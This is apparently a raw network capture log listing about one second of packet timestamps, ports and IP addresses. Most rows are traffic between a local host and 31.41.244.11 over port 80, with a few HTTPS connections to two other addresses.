Dec 22, 2024 02:16:51.710171938 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:51.710181952 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:51.710205078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.710268974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.710314035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.711590052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.711638927 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.711658001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.711694002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.711958885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.711997986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.740370035 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:51.740510941 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:51.740559101 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:51.762377977 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:51.762389898 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:51.762399912 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:51.762404919 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:51.833728075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.833782911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.833839893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.833857059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.833883047 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.833894968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834085941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834131956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834194899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834212065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834239960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834252119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834395885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834440947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834661961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834706068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834794998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834810972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834832907 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834836006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.834846020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.834873915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.835449934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.835500956 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.835545063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.835561037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.835587025 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.835611105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.835973024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836010933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836054087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836070061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836095095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836105108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836280107 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836327076 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836759090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836827993 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836863995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836880922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.836908102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.836920023 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.837093115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.837136030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.837511063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.837554932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.837630033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.837646008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.837673903 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.837685108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.837857008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.837898970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.838330030 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.838365078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.838424921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.838440895 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.838465929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.838475943 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.838627100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.838665009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839083910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839129925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839188099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839202881 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839231014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839246035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839406013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839448929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839885950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839924097 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.839967966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.839983940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.840009928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840029001 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840181112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.840219021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840671062 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.840713024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840756893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.840774059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.840802908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840821981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.840981007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.841027021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.841434956 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.841480017 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.841531992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.841548920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.841571093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.841587067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.841780901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.841820955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.842230082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.842271090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.842328072 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.842344999 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.842369080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.842392921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.842541933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.842578888 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843019009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843056917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843100071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843123913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843136072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843159914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843349934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843399048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843820095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843858957 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.843950987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843966961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.843992949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844001055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844171047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.844209909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844619989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.844656944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844687939 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.844703913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.844721079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844739914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.844909906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.844963074 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.845366001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.845406055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.845473051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.845489025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.845514059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.845525026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.845695972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.845732927 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.846148968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.846189976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.846252918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.846267939 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.846292973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.846311092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.846482038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.846529007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.846941948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.846995115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847039938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847054958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847081900 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847100019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847274065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847317934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847728968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847769022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847851038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847867012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.847887039 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.847904921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.848051071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.848089933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.848511934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.848551989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.848624945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.848642111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.848665953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.848680973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.848834038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.848875999 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.849292994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.849334002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.849401951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.849419117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.849440098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.849452019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.849652052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.849689960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850086927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850123882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850176096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850192070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850218058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850228071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850390911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850434065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850891113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850930929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.850982904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.850999117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.851031065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851031065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851186991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.851226091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851675034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.851723909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851778030 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.851794004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.851818085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851830006 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.851986885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.852034092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.852454901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.852498055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.852540970 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.852555990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.852580070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.852591991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876161098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876204014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876380920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876398087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876422882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876435041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876472950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876511097 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876636028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876652002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876672983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876683950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.876821995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.876857042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026148081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026173115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026190996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026233912 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026263952 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026371002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026407957 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026452065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026488066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026590109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026607037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026627064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026638985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026865005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.026906967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.026985884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027003050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027026892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.027039051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.027198076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027237892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.027667046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027712107 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.027726889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027765989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.027883053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.027932882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.028192043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.028234005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.028276920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.028295040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.028312922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.028331995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.028496981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029026031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029073000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.029141903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029159069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029197931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.029294968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029333115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.029871941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029917002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029932976 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.029956102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.029975891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.030158043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.030530930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.030572891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.030626059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.030641079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.030682087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.030865908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.030914068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.031322002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.031414986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.031431913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.031466007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.031488895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.031646967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032069921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.032140017 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032185078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.032216072 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032233000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032259941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.032270908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.032433033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032875061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032919884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.032970905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.032988071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.033030033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.033186913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.033231974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.033665895 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.033757925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.033775091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.033802986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.033828020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.033999920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.034471035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.034519911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.034567118 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.034583092 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.034622908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.034765005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.034809113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.035249949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.035357952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.035373926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.035402060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.035424948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.035571098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036066055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.036070108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036106110 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036112070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.036123037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036149979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.036163092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.036351919 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036812067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036854982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.036897898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.036914110 CET	80	49872	31.41.244.11	192.168.2.4
